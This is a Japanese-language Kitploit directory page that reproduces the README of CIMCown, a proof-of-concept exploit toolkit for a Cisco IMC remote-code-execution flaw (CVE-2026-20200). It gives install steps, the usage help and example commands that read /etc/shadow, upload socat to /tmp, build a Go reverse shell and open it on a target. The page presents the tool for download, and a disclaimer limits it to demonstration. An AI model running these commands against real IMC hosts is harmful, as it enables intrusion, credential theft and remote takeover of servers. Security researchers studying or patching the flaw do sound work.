Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CIMCown — PoCツールキット: Cisco IMC RCE CVE-2026-20200 を悪用するためのツールキット | Kitploit
ツール/GitHubGitHub/nside-attack-logic/cimcown
脆弱性分析エクスプロイトウェブアプリケーション悪用リモートアクセスツールペイロード開発
GitHubnside-attack-logic/cimcown

CIMCown

PoCツールキット: Cisco IMC RCE CVE-2026-20200 を悪用するためのツールキット

リポジトリを見る
110日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CIMCown

CVE-2026-20200 Cisco IMC における RCE を伴う引数インジェクション

Christoph Peil @ NSIDE ATTACK LOGIC 2026

CVE: CVE-2026-20200
CVSS v3.1 (CISCO): 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS v3.1 (NSIDE): 9.9 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
アドバイザリ: NSIDE-SA-2026-003
ブログ記事: https://www.nsideattacklogic.de/en/cisco-imc-when-remote-management-becomes-a-backdoor-cve-2026-20200/

この proof-of-concept はデモンストレーションのみを目的としており、違法行為への使用は許可されていません。 NSIDE ATTACK LOGIC は、このコードの使用または誤用によって生じたいかなる損害についても責任を負いません。

このエクスプロイトは、ファイルのダウンロード、ファイルのアップロード、リバースシェルの起動を可能にします。PoC の複数の Python ファイル、shell フォルダ、download フォルダが含まれています。

download フォルダには、サーバーからダウンロードされたすべてのファイルが、その名前(例: /etc/passwd > passwd)で配置されます。

shell フォルダには、リバースシェルに必要なすべてのものが含まれています。lib.so は、ARM 用にビルドされた小さなライブラリで、IMC 上の /tmp/main でバイナリを簡単に実行するためのものです。そのビルドに使用された正確なコマンドは util.py に記載されています。また、このフォルダには reverse_shell.go.example も置かれています。これは小さな Go 製リバースシェルで、リバースシェルに使用するローカル IP を含めるために、事前にコンパイルする必要があります。

リバースシェルを動作させるには、まず -a build アクションでビルドする必要があります。

インストール:

root@kitploit:~
sudo apt install golang-go
pip install -r requirements.txt

使い方

root@kitploit:~
Usage: CIMCown.py [-h] [--proxy PROXY] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-v]
options:
  -h, --help            show this help message and exit
  --proxy PROXY         Set proxy to use, e.g. 127.0.0.1:8080 (Default: NONE)
  -t, --host HOST       Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
  -U, --username USERNAME
  -P, --password PASSWORD
  -a, --action ACTION   Action: test, download, upload, build, shell (default: test)
						Test will connect to the CIMC and download the file /etc/passwd
  -u, --uploadFile UPLOADFILE
                        File to upload
  -p, --remoteFile REMOTEFILE
                        Remote file path to upload to
  -d, --downloadFile DOWNLOADFILE
                        File to download, is saved into 'Download'
  -v, --verbose         Displays more information about cimc

使用例

ユーザー名とパスワードには、大文字の U と大文字の P を使用することに注意してください!

ツールとログインのテスト

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a test -t 192.168.10.2

/etc/shadow ファイルのダウンロード

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a download -d '/etc/shadow' -t 192.168.10.2

./shell/socat ファイルを /tmp/socat へアップロード

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a upload -u './shell/socat' -p '/tmp/socat' -t 192.168.10.2

Go リバースシェルのビルド

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a build

リバースシェルを取得

リバースシェル内のローカル IP のためには、事前に action 'build' が必要です
root@kitploit:~
# action 'build' is needed before for local IP in revShell
python ./CIMCown.py -U testAdmin -P testPassword -a shell
ツールをダウンロード